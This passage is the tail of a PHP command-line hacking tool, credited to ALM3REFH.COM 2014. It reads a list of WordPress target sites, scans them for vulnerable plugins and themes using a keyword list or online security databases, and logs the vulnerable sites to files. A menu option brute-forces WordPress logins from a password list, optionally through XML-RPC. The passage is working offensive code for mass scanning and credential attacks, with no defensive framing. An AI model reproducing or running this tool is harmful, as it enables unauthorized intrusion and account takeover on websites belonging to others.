  653.        ##   POOYAA!   ##
  654.        #################
  655.        print "\n[+] Scanning begun";
  656.         $file = file_get_contents($list);
  657.         $plugins = explode("\n", $file);
  658.         print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n";
  659.         $targets = file_get_contents('wp.txt');
  660.         $r00t3rz = explode("\n", $targets);
  661.         print "\nWant to use a keyword (or use headers respond) ? [Y/n]: ";
  662.         $key = strtolower(trim(fgets(STDIN)));
  663.         if(in_array($key, $yesno)){
  664.             $key = "set";
  665.         }else{
  666.             $key = NULL;
  667.         }
  668.         foreach($r00t3rz as $z){
  669.             if(!$z == ""){
  670.                 xp_scanner($z, $list, $key);
  671.             }
  672.         }
  673.         /*
  674.         #################
  675.         ##   Results   ##
  676.         #################
  677.         print "\n[+] Scanning finished!";
  678.         $vul = file_get_contents('vuln.txt');
  679.         $able = explode("\n", $vul);
  680.         print '[ '.count($able).' Website ]\n';
  681.         foreach($able as $gxp){
  682.             if(!$gxp==""){
  683.                 print "\n\t[!] $gxp";
  684.             }
  685.         }
  686.         */
  687.         bye();
  688.     } elseif($what == "2") {
  689.         print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n";
  690.         #################
  691.        ##   POOYAA!   ##
  692.        #################
  693.        print "\n[+] Scanning begun";
  694.         $targets = file_get_contents('wp.txt');
  695.         $r00t3rz = explode("\n", $targets);
  696.         foreach($r00t3rz as $z){
  697.             if(!$z == ""){
  698.                 xp_get_plugins($z);
  699.                 xp_get_themes($z);
  700.             }
  701.         }
  702.         #################
  703.        ##   Results   ##
  704.        #################
  705.        print "\n[+] Finished, these are the websites have a vulnerability plugin/s:\n";
  706.         $vulpl = file_get_contents('vulpl.txt');
  707.         $getpl = explode("\n", $vulpl);
  708.         #print "[ ".count($get)." Website ]\n"; // empty lines will be counted
  709.        foreach($getpl as $vul){
  710.             if(!$vul==""){
  711.                 print "\n\t$vul";
  712.             }
  713.         }
  714.         bye();
  715.     } elseif($what == "3") {
  716.         print "\nNP, WHERE IS YOUR PASSWORS LIST? [ex: hk.txt] : ";
  717.         $list = trim(fgets(STDIN));
  718.         if(!is_file($list)) {
  719.             #######################
  720.            ##  CAN'T LOAD LIST  ##
  721.            #######################
  722.            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
  723.             ##############
  724.            ##   EXIT   ##
  725.            ##############
  726.            bye();
  727.         }
  728.         #################
  729.        ##   POOYAA!   ##
  730.        #################
  731.        print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: ";
  732.         $xmlrpc = strtolower(trim(fgets(STDIN)));
  733.         if(in_array($xmlrpc, $yesno)){
  734.             $xml = "set";
  735.         }else{
  736.             $xml = NULL;
  737.         }
  738.         print "\n[+] Bruting begun";
  739.         $targets = file_get_contents('wp.txt');
  740.         $xp = explode("\n", $targets);
  741.         foreach($xp as $z){
  742.             if(!$z == ""){
  743.                 xp_get_user($z, $list, $xml);
  744.             }
  745.         }
  746.         bye();
  747.     } else {
  748.         ######################
  749.        ##  OOH KILL'EM =P  ##
  750.        ######################
  751.        bye();
  752.     }
  753. }
  754. #####################################
  755. ##  © ALM3REFH.COM 2014 - CHEERS!  ##
  756. #####################################
  757. ?>